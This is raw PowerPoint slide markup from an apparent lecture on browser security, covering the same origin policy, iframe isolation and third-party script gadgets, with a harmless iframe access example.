        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4199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81336" y="2564904"/>
              <a:ext cx="3870770" cy="3024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Rectangle 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5122008" y="3285842"/>
              <a:ext cx="1583553" cy="2230875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5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GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="29" name="Straight Connector 28"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6018400" y="5516716"/>
              <a:ext cx="143158" cy="360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6954436" y="3212740"/>
              <a:ext cx="1799392" cy="22333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GB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7853030" y="5446135"/>
              <a:ext cx="162980" cy="4310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999" name="TextBox 31"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4941408" y="5733255"/>
              <a:ext cx="2459040" cy="464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300"/>
                <a:t>Google Maps Gadget</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42000" name="TextBox 32"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7601614" y="5733255"/>
              <a:ext cx="1658774" cy="7816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300"/>
                <a:t>Integrator’s</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr lang="en-GB" sz="1300"/>
                <a:t>Housing Data</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Right Arrow 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="6377397" y="4077361"/>
              <a:ext cx="936036" cy="431051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chemeClr val="accent1">
                  <a:shade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GB" sz="6700" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>X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002477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same origin policy (SOP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43011" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="508000" y="1771650"/>
            <a:ext cx="8288338" cy="5392738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宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>The &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>&gt; tag:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Accolade ouvrante 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1354138" y="3625850"/>
            <a:ext cx="338137" cy="34575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1370" tIns="50685" rIns="101370" bIns="50685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3013" name="ZoneTexte 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="84138" y="5143500"/>
            <a:ext cx="1270000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370" tIns="50685" rIns="101370" bIns="50685">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Century Schoolbook" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>browser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92275" y="3625850"/>
            <a:ext cx="2706688" cy="160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70" tIns="50685" rIns="101370" bIns="50685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integrator’s code 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92275" y="5229225"/>
            <a:ext cx="2706688" cy="16017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70" tIns="50685" rIns="101370" bIns="50685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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iframe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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t> http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b.com/gadget.html </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;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…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&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle à coins arrondis 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4821238" y="2614613"/>
            <a:ext cx="4906962" cy="47228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70" tIns="50685" rIns="101370" bIns="50685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43017" name="ZoneTexte 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5245100" y="2782888"/>
            <a:ext cx="1776413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370" tIns="50685" rIns="101370" bIns="50685">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>HEAP </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Ellipse 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7443788" y="3541713"/>
            <a:ext cx="2030412" cy="927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70" tIns="50685" rIns="101370" bIns="50685" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>global object</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Ellipse 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5075238" y="3625850"/>
            <a:ext cx="2030412" cy="9286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70" tIns="50685" rIns="101370" bIns="50685" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>global object</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Connecteur en angle 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4236244" y="4299744"/>
            <a:ext cx="4638675" cy="143668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826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Frame isolation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82947" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="508000" y="1771650"/>
            <a:ext cx="9247188" cy="5392738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宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Other frames cannot access resources from other origins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;!-- This is allowed --&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iframe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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sameDomainPage.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;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&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>alert(frames[0].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>contentDocument.body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>); //works fine   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;!-- This is **NOT** allowed --&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iframe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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>google.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;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&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>alert(frames[0].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>contentDocument.body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>); //throws error</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800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04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ce réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="508000" y="1771650"/>
            <a:ext cx="8288338" cy="5392738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宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>The &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>&gt; tag: code treated as external code (different origin).  The cross domain request is forbidden only before HTML5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4403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same origin policy (SOP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1692275" y="3625850"/>
            <a:ext cx="2706688" cy="160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70" tIns="50685" rIns="101370" bIns="50685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integrator’s code </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Accolade ouvrante 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1268413" y="3457575"/>
            <a:ext cx="338137" cy="34575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1370" tIns="50685" rIns="101370" bIns="50685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4039" name="ZoneTexte 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="84138" y="5143500"/>
            <a:ext cx="1270000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370" tIns="50685" rIns="101370" bIns="50685">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Century Schoolbook" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>browser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05513" y="3625850"/>
            <a:ext cx="2706687" cy="160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70" tIns="50685" rIns="101370" bIns="50685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server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a.com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05513" y="5397500"/>
            <a:ext cx="2706687" cy="16017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70" tIns="50685" rIns="101370" bIns="50685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server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b.com</a:t>
            </a:r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4483100" y="6072188"/>
            <a:ext cx="1438275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692275" y="5229225"/>
            <a:ext cx="2706688" cy="16017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70" tIns="50685" rIns="101370" bIns="50685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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iframe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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t> http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b.com/gadget.html </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;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…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&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Connecteur droit avec flèche 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4427165" y="4442991"/>
            <a:ext cx="1438275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2"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4499173" y="4659015"/>
            <a:ext cx="1440160" cy="9361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4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185221" y="5019055"/>
            <a:ext cx="106040" cy="3600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948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ce réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="508000" y="1771650"/>
            <a:ext cx="8288338" cy="5392738"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>The &lt;script&gt; tag permits to treat code as code from the same origin. The cross domain request is forbidden only before HTML5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4403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same origin policy (SOP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1692275" y="3625850"/>
            <a:ext cx="2706688" cy="160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70" tIns="50685" rIns="101370" bIns="50685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integrator’s code </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1692275" y="5229225"/>
            <a:ext cx="2706688" cy="160178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70" tIns="50685" rIns="101370" bIns="50685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&lt;script  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=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http://b.com/gadget.js&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Accolade ouvrante 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1268413" y="3457575"/>
            <a:ext cx="338137" cy="34575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1370" tIns="50685" rIns="101370" bIns="50685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4039" name="ZoneTexte 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="84138" y="5143500"/>
            <a:ext cx="1270000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370" tIns="50685" rIns="101370" bIns="50685">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Century Schoolbook" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>browser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05513" y="3625850"/>
            <a:ext cx="2706687" cy="160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70" tIns="50685" rIns="101370" bIns="50685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server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a.com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05513" y="5397500"/>
            <a:ext cx="2706687" cy="16017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70" tIns="50685" rIns="101370" bIns="50685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server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b.com</a:t>
            </a:r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4483100" y="6072188"/>
            <a:ext cx="1438275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rot="5400000">
            <a:off x="4991100" y="5902326"/>
            <a:ext cx="422275" cy="254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2"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4427165" y="4442991"/>
            <a:ext cx="1438275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2"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4499173" y="4659015"/>
            <a:ext cx="1440160" cy="9361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392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Objectives of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>lectures on information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Get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the basis to understand </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>privacy-violating information flows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, defenses, prevention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Get acquainted with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>formal methods for security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Get acquainted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>with static </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ynamic mechanisms for information flow security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same origin policy (SOP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45059" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="508000" y="1771650"/>
            <a:ext cx="8288338" cy="5392738"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>The &lt;script&gt; tag:  what about Javascript behaviour? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Accolade ouvrante 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1354138" y="3625850"/>
            <a:ext cx="338137" cy="34575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1370" tIns="50685" rIns="101370" bIns="50685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5061" name="ZoneTexte 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="84138" y="5143500"/>
            <a:ext cx="1270000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370" tIns="50685" rIns="101370" bIns="50685">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Century Schoolbook" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>browser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92275" y="3625850"/>
            <a:ext cx="2706688" cy="160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70" tIns="50685" rIns="101370" bIns="50685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integrator’s code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92275" y="5229225"/>
            <a:ext cx="2706688" cy="160178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70" tIns="50685" rIns="101370" bIns="50685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&lt;script  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=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white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://b.com/gadget.js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white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle à coins arrondis 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4821238" y="2614613"/>
            <a:ext cx="4906962" cy="47228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70" tIns="50685" rIns="101370" bIns="50685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10" name="ZoneTexte 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5245100" y="2782888"/>
            <a:ext cx="1776413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370" tIns="50685" rIns="101370" bIns="50685">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>HEAP </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Ellipse 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6011341" y="3938935"/>
            <a:ext cx="2030412" cy="927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70" tIns="50685" rIns="101370" bIns="50685" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>global object</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="975310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62000" y="2357438"/>
            <a:ext cx="8626475" cy="1627187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Isolation</a:t>
            </a:r>
            <a:r>
